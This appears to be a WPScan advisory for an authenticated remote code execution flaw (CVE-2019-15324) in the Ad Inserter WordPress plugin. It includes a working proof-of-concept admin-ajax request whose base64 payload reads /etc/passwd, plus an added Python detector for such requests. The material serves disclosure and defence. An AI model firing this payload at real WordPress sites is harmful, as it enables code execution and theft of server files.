Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution
Proof of Concept
The nonce (sent as the ai_check parameter in the final request) can be obtained by requesting the homepage with the AI_WP_DEBUGGING cookie set to 2, so it is not a secret that limits who can reach the handler.

Then, use an account with a role as low as Subscriber to perform the request below (the value of the code parameter is the base64 encoding of <?php echo file_get_contents('/etc/passwd'); ?>):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1
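Added example, not part of the WPScan entry or the plugin's own code: a small Python detector for request bodies captured for POST /wp-admin/admin-ajax.php (it assumes a WAF or reverse proxy with body logging supplies them). It flags Ad Inserter preview requests that ask for PHP processing (php=1), decodes the code parameter so an analyst can see the submitted block, and separately flags the AI_WP_DEBUGGING=2 cookie that the nonce-retrieval step depends on. The sample bodies are constructed; the third is the PoC body from the request above with the nonce snipped. Detection is a compensating control only; the fix is updating past 2.4.21 (see the changeset reference).

```python
"""Flag Ad Inserter admin-ajax preview requests that ask for PHP processing.

Added example for this advisory; it is not WPScan's or the plugin's code.
Input is constructed: request bodies as a WAF or reverse proxy with body
logging (assumed) would record them for POST /wp-admin/admin-ajax.php.
"""
import base64
from urllib.parse import parse_qs

# Constructed sample request bodies. The third is the PoC body from the
# advisory with the nonce snipped.
SAMPLE_BODIES = [
    "action=heartbeat&_nonce=abc123&data%5Bwp_autosave%5D=1",
    "action=ai_ajax_backend&preview=1&ai_check=deadbeef&code=PGRpdj5hZDwvZGl2Pg%3D%3D",
    "action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]"
    "&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1",
]

PHP_OPEN_TAGS = ("<?php", "<?=")


def decode_code_param(value):
    """Return the decoded block content, or None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def inspect_body(body):
    """Classify one admin-ajax request body.

    Returns None for traffic that is not an Ad Inserter preview request,
    otherwise a dict with the decoded block and a severity:
      'high'   - php=1 and a PHP open tag appears in the decoded block
      'medium' - php=1 requested, but no PHP open tag visible in the block
      'info'   - preview without php=1
    """
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action") != ["ai_ajax_backend"] or params.get("preview") != ["1"]:
        return None
    php_requested = params.get("php") == ["1"]
    decoded = decode_code_param(params.get("code", [""])[0])
    has_php_tag = decoded is not None and any(t in decoded for t in PHP_OPEN_TAGS)
    if php_requested and has_php_tag:
        severity = "high"
    elif php_requested:
        severity = "medium"
    else:
        severity = "info"
    return {"severity": severity, "php": php_requested, "decoded": decoded}


def has_debug_cookie(cookie_header):
    """True if the Cookie header carries AI_WP_DEBUGGING=2, the cookie the
    advisory says makes the preview nonce visible on the public homepage."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "AI_WP_DEBUGGING" and value.strip() == "2":
            return True
    return False


def scan(bodies):
    """Return (index, finding) pairs for every body that is a preview request."""
    findings = []
    for i, body in enumerate(bodies):
        finding = inspect_body(body)
        if finding is not None:
            findings.append((i, finding))
    return findings


if __name__ == "__main__":
    for i, f in scan(SAMPLE_BODIES):
        print(f"body[{i}] severity={f['severity']} php={f['php']} block={f['decoded']!r}")
```

Requests that score "high" or "medium" should be correlated with the WordPress user making them: with the capability check missing in affected versions, any authenticated account can reach the handler, so a preview request with php=1 from a non-administrator is the signal worth paging on.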

Affects Plugin

References

CVE 2019-15324
URL https://www.wordfence.com/blog/2019/07/critical-vulnerability-patched-in-ad-inserter-plugin/
URL https://plugins.trac.wordpress.org/changeset/2122577/ad-inserter

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Sean Murphy (Wordfence)
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Views 4068
Verified No
WPVDB ID 9455

Timeline

Publicly Published 2019-07-15 (5 months ago)
Added 2019-07-15 (5 months ago)
Last Updated 2019-11-28 (16 days ago)
